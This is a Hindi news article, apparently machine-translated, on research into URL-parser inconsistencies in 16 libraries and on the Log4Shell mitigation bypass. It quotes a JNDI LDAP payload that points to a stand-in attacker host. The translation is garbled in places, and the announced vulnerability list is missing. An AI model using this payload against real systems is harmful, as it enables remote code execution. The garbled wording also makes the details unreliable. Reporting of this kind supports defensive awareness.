16 विभिन्न यूनिफ़ॉर्म रिसोर्स लोकेटर का एक अध्ययन (यूआरएल) पार्सिंग पुस्तकालयों ने उन विसंगतियों और भ्रमों का पता लगाया है जिनका उपयोग सत्यापन को बायपास करने और हमले के वैक्टर की एक विस्तृत श्रृंखला के लिए दरवाजा खोलने के लिए किया जा सकता है।

साइबर सुरक्षा फर्मों द्वारा संयुक्त रूप से किए गए गहन विश्लेषण में क्लारोटी और सिंक, आठ सुरक्षा कमजोरियों की पहचान सी, जावास्क्रिप्ट, पीएचपी, पायथन और रूबी भाषाओं में लिखी गई और कई वेब अनुप्रयोगों द्वारा उपयोग की जाने वाली कई तृतीय-पक्ष पुस्तकालयों में की गई थी।

“यूआरएल पार्सिंग में भ्रम सॉफ्टवेयर में अप्रत्याशित व्यवहार (जैसे, वेब एप्लिकेशन) का कारण बन सकता है, और धमकी देने वाले अभिनेताओं द्वारा सेवा की शर्तों, सूचना लीक, या संभवतः रिमोट कोड निष्पादन हमलों का कारण बनने के लिए शोषण किया जा सकता है,” शोधकर्ताओं ने कहा। द हैकर न्यूज के साथ साझा की गई एक रिपोर्ट में कहा।

चूंकि URL एक मौलिक तंत्र है जिसके द्वारा – स्थानीय या वेब पर स्थित संसाधनों का अनुरोध और पुनर्प्राप्ति किया जा सकता है, पार्सिंग लाइब्रेरी URL अनुरोध की व्याख्या करने के तरीके में अंतर उपयोगकर्ताओं के लिए महत्वपूर्ण जोखिम पैदा कर सकता है।

स्वचालित GitHub बैकअप

एक मामला महत्वपूर्ण है लॉग4शैल दोष पिछले महीने सर्वव्यापी Log4j लॉगिंग फ्रेमवर्क में खुलासा किया गया, जो इस तथ्य से उपजा है कि एक दुर्भावनापूर्ण हमलावर-नियंत्रित स्ट्रिंग, जब मूल्यांकन किया जाता है और जब इसे एक कमजोर एप्लिकेशन द्वारा लॉग किया जा रहा है, तो इसका परिणाम होता है जेएनडीआई लुकअप जो एक विरोधी द्वारा संचालित सर्वर से जुड़ता है और मनमाना जावा कोड निष्पादित करता है।

हालांकि अपाचे सॉफ्टवेयर फाउंडेशन (एएसएफ) ने कमजोरी को दूर करने के लिए जल्दी से ठीक किया, लेकिन जल्द ही यह सामने आया कि शमन किया जा सकता है नजरअंदाज “${jndi:ldap://127.0.0 .” प्रारूप में विशेष रूप से तैयार किए गए इनपुट द्वारा[.]1#.evilhost.com:1389/a}” जो एक बार फिर दूरस्थ JNDI लुकअप को कोड निष्पादन प्राप्त करने की अनुमति देता है।

“यह बाईपास इस तथ्य से उपजा है कि जेएनडीआई लुकअप प्रक्रिया के अंदर दो अलग (!) यूआरएल पार्सर्स का इस्तेमाल किया गया था, यूआरएल को सत्यापित करने के लिए एक पार्सर, और दूसरा इसे लाने के लिए, और इस पर निर्भर करता है कि प्रत्येक पार्सर फ्रैगमेंट भाग (#) के साथ कैसे व्यवहार करता है यूआरएल, प्राधिकरण भी बदलता है,” शोधकर्ताओं ने कहा।

विशेष रूप से, यदि इनपुट को एक नियमित HTTP URL के रूप में माना जाता है, तो अधिकार घटक – डोमेन नाम और पोर्ट नंबर का संयोजन – खंड पहचानकर्ता का सामना करने पर समाप्त होता है, जबकि, जब एलडीएपी यूआरएल के रूप में माना जाता है, तो पार्सर पूरे “127.0.0” को असाइन करेगा।[.]1#.evilhost.com:1389″ प्राधिकरण के रूप में क्योंकि एलडीपी यूआरएल विनिर्देश खंड के लिए जिम्मेदार नहीं है।

वास्तव में, आठ कमजोरियों की खोज के दो प्राथमिक कारणों में से एक के रूप में कई पार्सर्स का उपयोग उभरा, दूसरा विसंगतियों से उत्पन्न होने वाले मुद्दे हैं जब पुस्तकालय विभिन्न यूआरएल विनिर्देशों का पालन करते हैं, प्रभावी रूप से एक शोषक छेड़छाड़ का परिचय देते हैं।

असंगति भ्रम से लेकर बैकस्लैश वाले URL (“”), स्लैश की अनियमित संख्या (जैसे, https:///www.example) से होती है।[.]कॉम), या यूआरएल एन्कोडेड डेटा (“%”) लापता यूआरएल योजना वाले यूआरएल के लिए, जिसका इस्तेमाल रिमोट कोड एक्जीक्यूशन या स्टेज डिनायल-या-सर्विस (DoS) हासिल करने के लिए किया जा सकता है और ओपन-रीडायरेक्ट फ़िशिंग हमले।

डेटा उल्लंघनों को रोकें

खोजी गई आठ कमजोरियों की सूची इस प्रकार है, जिनमें से सभी को संबंधित अनुरक्षकों द्वारा संबोधित किया गया है –

शोधकर्ताओं ने कहा, “विभिन्न पार्सिंग प्राइमेटिव से कई वास्तविक जीवन के हमले के परिदृश्य उत्पन्न हो सकते हैं।” एप्लिकेशन को URL पार्सिंग कमजोरियों से बचाने के लिए, “यह पूरी तरह से समझना आवश्यक है कि पूरी प्रक्रिया में कौन से पार्सर शामिल हैं [and] पार्सर्स के बीच अंतर, चाहे वह उनकी उदारता हो, वे विभिन्न विकृत यूआरएल की व्याख्या कैसे करते हैं, और वे किस प्रकार के यूआरएल का समर्थन करते हैं।”

.


Source link

LEAVE A REPLY

Please enter your comment!
Please enter your name here